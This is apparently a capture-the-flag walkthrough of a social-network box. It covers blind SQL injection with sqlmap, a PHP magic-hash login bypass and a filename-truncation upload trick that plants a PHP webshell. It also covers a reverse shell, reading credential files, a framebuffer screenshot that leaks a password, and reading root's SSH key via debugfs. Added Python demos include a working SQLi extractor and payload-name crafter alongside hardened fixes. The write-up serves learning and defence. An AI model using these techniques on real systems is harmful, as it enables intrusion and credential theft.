Nmap scan:
Port 80 reveals a kind of social network website.
I ran a gobuster scan on the website, and it revealed tons of interesting directories.
In the cyberlaw.txt file, we can find some hints on what to do next.
Interesting. So there's a chris user, and he hacked the website first.
There was a login page on the website we could access.
When trying to enter credentials for the admin user, this was the error received. When entering a random username instead, we get a different error.
The two different errors mean the application leaks whether the username exists, which is exactly the oracle a boolean-based blind SQL injection needs. I proceeded to test this with sqlmap using the --level=5 --risk=3 flags. I also included the --string flag to tell sqlmap which string in the response marks the TRUE condition (here, the error returned for a user that exists), so it can tell the two cases apart.
We can then dump out the database.
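To show what sqlmap is doing under the hood with --string, here is an added example (not code from the original writeup or from the target) that reproduces the boolean oracle locally: a constructed SQLite database and a login handler that concatenates the username into the query, two constructed response strings standing in for the two errors seen on the site, and an extractor that recovers a column one character at a time purely from which message comes back. The table contents, the hashes and the messages are all made up for the demonstration; a hardened handler with a parameterised query and a single failure message is included for contrast.

```python
import sqlite3

# Constructed stand-in for the vulnerable login page: a tiny SQLite database
# and a handler that concatenates the username straight into the query.
# The two distinct responses are the boolean oracle described above.
_db = sqlite3.connect(":memory:")
_db.execute("CREATE TABLE users (username TEXT, password TEXT)")
_db.execute("INSERT INTO users VALUES ('admin', 'd41d8cd98f00b204e9800998ecf8427e')")  # constructed
_db.execute("INSERT INTO users VALUES ('chris', 'deadbeef0badf00d')")                  # constructed

USER_EXISTS = "Wrong identification"   # constructed: message when a row matched the username
NO_SUCH_USER = "Try again"             # constructed: message when no row matched


def login(username: str, password: str = "x") -> str:
    """Vulnerable handler: the username is interpolated, so a quote breaks out of the literal."""
    query = f"SELECT password FROM users WHERE username = '{username}'"
    try:
        row = _db.execute(query).fetchone()
    except sqlite3.Error:
        return NO_SUCH_USER
    if row is None:
        return NO_SUCH_USER
    return "Logged in" if row[0] == password else USER_EXISTS


def oracle(payload: str) -> bool:
    """True when the injected condition held, judged the way sqlmap --string does:
    the TRUE marker string is present in the response."""
    return USER_EXISTS in login(payload)


def extract_column(username: str, column: str, alphabet: str = "0123456789abcdef") -> str:
    """Recover users.<column> for <username> one character at a time.

    Each probe asks: does the character at position i equal <ch>?  A match keeps
    the row and yields the 'user exists' message; a miss drops it and yields
    'no such user'.  Extraction stops when no character of the alphabet matches,
    i.e. when we have run past the end of the value (hex alphabet suits hashes).
    """
    result = ""
    while True:
        for ch in alphabet:
            pos = len(result) + 1  # SQL substr() is 1-indexed
            # The trailing "-- " comments out the quote left over from the original query.
            payload = f"{username}' AND substr({column},{pos},1)='{ch}'-- "
            if oracle(payload):
                result += ch
                break
        else:
            return result


def login_fixed(username: str, password: str = "x") -> str:
    """Hardened handler: parameterised query and one message for both failure cases,
    so neither injection nor username enumeration is possible."""
    row = _db.execute("SELECT password FROM users WHERE username = ?", (username,)).fetchone()
    if row is not None and row[0] == password:
        return "Logged in"
    return "Invalid credentials"
```

extract_column("admin", "password") walks the hash out of the constructed database using nothing but the two messages; sqlmap automates the same loop (with smarter search than one character at a time) once --string tells it which message is the TRUE case.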
Now we can login as chris.
Viewing the profile of chris reveals a hint to use PHP Type Juggling.
PHP type juggling is a vulnerability class that comes from loose comparison (==): when both operands look numeric, PHP compares them as numbers, so a hash like 0e12345... is read as 0 times 10 to some power, which is 0, and compares equal to any other hash of the form 0e followed only by digits. If the stored hash has that form, any password whose hash also has that form passes the check. There are repositories of such "magic hash" inputs that we can use easily.
When using one of these magic-hash inputs as the password on the login page, we can login as the admin user.
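The comparison rule, as an added example rather than anything from the original writeup or the target's source: a small model of PHP's == on strings, a check for whether an input's MD5 is a magic hash, and a constructed login check with a stored hash that happens to have the 0e form (md5("240610708") is one of the well-known magic MD5 inputs, as is "QNKCDZO"). The stored hash and the login functions are constructed for the demonstration; the hardened version uses a constant-time exact comparison, the equivalent of === or hash_equals() in PHP.

```python
import hashlib
import hmac
import re

# PHP treats a string as numeric when it parses as an integer or float, including
# scientific notation such as "0e1234".  This regex models only the rule that
# matters here; it is not a full implementation of PHP's numeric-string check.
_NUMERIC = re.compile(r"^\s*[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?\s*$")
_MAGIC = re.compile(r"^0e\d+$")


def php_loose_equals(a: str, b: str) -> bool:
    """PHP's == between two strings: numeric strings are compared as numbers."""
    if _NUMERIC.match(a) and _NUMERIC.match(b):
        return float(a) == float(b)   # "0e<digits>" becomes 0.0 on both sides
    return a == b


def is_magic_md5(plaintext: str) -> bool:
    """True when md5(plaintext) is of the form 0e<digits>, i.e. PHP reads it as zero."""
    return bool(_MAGIC.match(hashlib.md5(plaintext.encode()).hexdigest()))


# Constructed: a stored admin hash that happens to be of the 0e... form.
STORED_HASH = hashlib.md5(b"240610708").hexdigest()


def vulnerable_login(password: str) -> bool:
    """Equivalent of  md5($password) == $stored_hash  in PHP (loose comparison)."""
    return php_loose_equals(hashlib.md5(password.encode()).hexdigest(), STORED_HASH)


def fixed_login(password: str) -> bool:
    """Exact, constant-time comparison: only the real password is accepted."""
    return hmac.compare_digest(hashlib.md5(password.encode()).hexdigest(), STORED_HASH)
```

vulnerable_login("QNKCDZO") succeeds even though its hash is a completely different string from STORED_HASH, because both collapse to 0.0 under loose comparison; fixed_login rejects it.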
Viewing the profile of the admin user shows a hint to bypass some kind of limit.
Didn't know how to abuse this yet, so I tried to exploit the image upload function that we now had access to.
I attempted to upload some PHP webshells, but it did not work.
When uploading a jpg file, this is the output we get.
Attempting to access our webshell does not work. However, the output shows that the name of our file ends up inside the command being executed, so the file name is something we control. Recall the hint on the admin profile about the limits of the file name.
So, I tested this by changing the file name to something absurdly long. The output contained a rather suspicious Trying to shorten... message. Perhaps we could use this to remove the .jpg extension and leave a .php extension: the extension check runs on the name we submit, but the name that actually gets saved is the shortened one. So what I did was upload a cmd.php.jpg file, with the name padded such that it would shorten to cmd.php, letting the truncation drop the .jpg and leave my webshell in place. This means the name up to and including cmd.php has to be exactly 236 characters long (the maximum, when counted), with the .jpg falling beyond the cut-off; this works in uploading the file.
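The truncation bypass, as an added example that is not the target's upload code: a model of the server's behaviour (check the extension on the submitted name, then shorten it to the 236-character limit observed above), a helper that pads a name so the shortening lands exactly at the end of cmd.php, and a hardened variant that validates the name it will actually store. The allow-list, the padding character and the exact shortening rule are assumptions made for the demonstration.

```python
from typing import Optional

MAX_NAME = 236  # the observed limit: the longest name that survives "Trying to shorten..."

ALLOWED_EXTENSIONS = (".jpg", ".jpeg", ".png", ".gif")  # constructed allow-list


def shorten(name: str, limit: int = MAX_NAME) -> str:
    """Model of the server's shortening: keep only the first `limit` characters."""
    return name[:limit]


def has_allowed_extension(name: str) -> bool:
    return name.lower().endswith(ALLOWED_EXTENSIONS)


def vulnerable_upload(name: str) -> Optional[str]:
    """Checks the extension on the submitted name, then shortens it for storage.
    Returns the stored name, or None when the upload is rejected."""
    if not has_allowed_extension(name):
        return None
    return shorten(name)


def hardened_upload(name: str) -> Optional[str]:
    """Shortens first and validates the name that will actually be written,
    so the stored extension is the one that was checked."""
    stored = shorten(name)
    if not has_allowed_extension(stored):
        return None
    return stored


def craft_name(target: str = "cmd.php", decoy_ext: str = ".jpg",
               limit: int = MAX_NAME, pad_char: str = "a") -> str:
    """Build a name that passes the extension check but shortens to `target`:
    padding + target fills exactly `limit` characters, and the decoy extension
    sits beyond the cut-off."""
    if len(target) > limit:
        raise ValueError("target longer than the limit")
    padding = pad_char * (limit - len(target))
    return padding + target + decoy_ext
```

craft_name() yields a 240-character name ending in cmd.php.jpg; vulnerable_upload accepts it because of the .jpg and stores the first 236 characters, which end in cmd.php, while hardened_upload shortens first, sees a .php name, and rejects it.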
We can then test our RCE.
Then we can get a reverse shell easily.
First, we can view the users present on this machine by reading the /etc/passwd file, and see that moshe and yossi are present.
Then, we can view the files for the webroot. In there, we can find some SQL credentials.
We can then su to moshe.
When running LinPEAS, we see that moshe is part of the video group.
Users in the video group can read the framebuffer device, i.e. the raw contents of the screen, so whatever is currently on the display can be dumped. I first checked if there were other users logged in via w, and yossi is logged in.
This means we can take a screenshot of his session and see if we can find any credentials. This blog was useful in exploiting it.
Then, we can run this perl script to convert the raw data into a screenshot.
Afterwards, we can transfer this back to our machine and find that it is an image file.
Initially, the picture looked like some kind of rubbish. Then I realised it was probably because I had messed up the dimensions of the image, so I changed them to the values the script expects using gimp, which revealed some credentials:
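The conversion step and the dimension problem, as an added example (not the perl script the writeup refers to, which is not reproduced here): a Python converter that turns a raw framebuffer dump into a binary PPM, plus a helper that reads the geometry from the standard sysfs attributes of the framebuffer (virtual_size and bits_per_pixel under /sys/class/graphics/fb0) so the dimensions are right the first time. It assumes the common 32-bit BGRX (or 24-bit BGR) pixel layout; a dump whose lines carry padding can be handled with the stride parameter. The sample pixels in the usage note are constructed.

```python
import os
from typing import Tuple


def read_fb_geometry(sysfs_dir: str = "/sys/class/graphics/fb0") -> Tuple[int, int, int]:
    """Return (width, height, bits_per_pixel) for a framebuffer from sysfs.
    virtual_size holds 'WIDTH,HEIGHT'; bits_per_pixel holds a plain integer."""
    with open(os.path.join(sysfs_dir, "virtual_size")) as f:
        width, height = (int(v) for v in f.read().strip().split(","))
    with open(os.path.join(sysfs_dir, "bits_per_pixel")) as f:
        bpp = int(f.read().strip())
    return width, height, bpp


def fb_to_ppm(raw: bytes, width: int, height: int, bpp: int = 32, stride: int = 0) -> bytes:
    """Convert a raw framebuffer dump into a binary PPM (P6) image.

    Assumes the usual little-endian BGR(X) layout: each pixel is stored as
    B, G, R and, at 32 bpp, one unused byte.  `stride` is the number of bytes
    per scan line when each line carries padding; 0 means width * bytes per pixel.
    A dump that is too short for the stated geometry is rejected rather than
    silently producing a scrambled image.
    """
    if bpp not in (24, 32):
        raise ValueError("only 24 and 32 bpp BGR layouts are handled")
    bytes_per_pixel = bpp // 8
    stride = stride or width * bytes_per_pixel
    if len(raw) < stride * height:
        raise ValueError(f"dump too short: need {stride * height} bytes, got {len(raw)}")
    out = bytearray(b"P6\n%d %d\n255\n" % (width, height))
    for y in range(height):
        line = raw[y * stride : y * stride + width * bytes_per_pixel]
        for x in range(0, len(line), bytes_per_pixel):
            b, g, r = line[x], line[x + 1], line[x + 2]
            out += bytes((r, g, b))   # PPM wants R, G, B
    return bytes(out)


if __name__ == "__main__":
    import sys
    # usage: python fb2ppm.py screen.raw WIDTH HEIGHT [BPP] > screen.ppm
    # (WIDTH, HEIGHT and BPP are what read_fb_geometry() returns on the target)
    data = open(sys.argv[1], "rb").read()
    w, h = int(sys.argv[2]), int(sys.argv[3])
    bits = int(sys.argv[4]) if len(sys.argv) > 4 else 32
    sys.stdout.buffer.write(fb_to_ppm(data, w, h, bits))
```

For a constructed two-pixel dump b"\x11\x22\x33\x00\xaa\xbb\xcc\xff" with width 2 and height 1, the output is the header P6 / 2 1 / 255 followed by the six bytes 33 22 11 cc bb aa: each BGRX quad has been swapped to RGB. Getting width or height wrong shifts every row, which is exactly the "rubbish" image described above, so read the geometry from sysfs on the target rather than guessing it.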
Then, we can su as yossi.
Earlier, we found that yossi was part of the disk and cdrom groups. Members of the disk group can read block devices directly, bypassing filesystem permissions, so perhaps there was something mounted on the machine that we could read.
Using debugfs on the /dev/sda1 filesystem (the device that stood out), we find that we can browse the /root directory.
We can also find the private SSH key for root. Then, we can SSH in as root.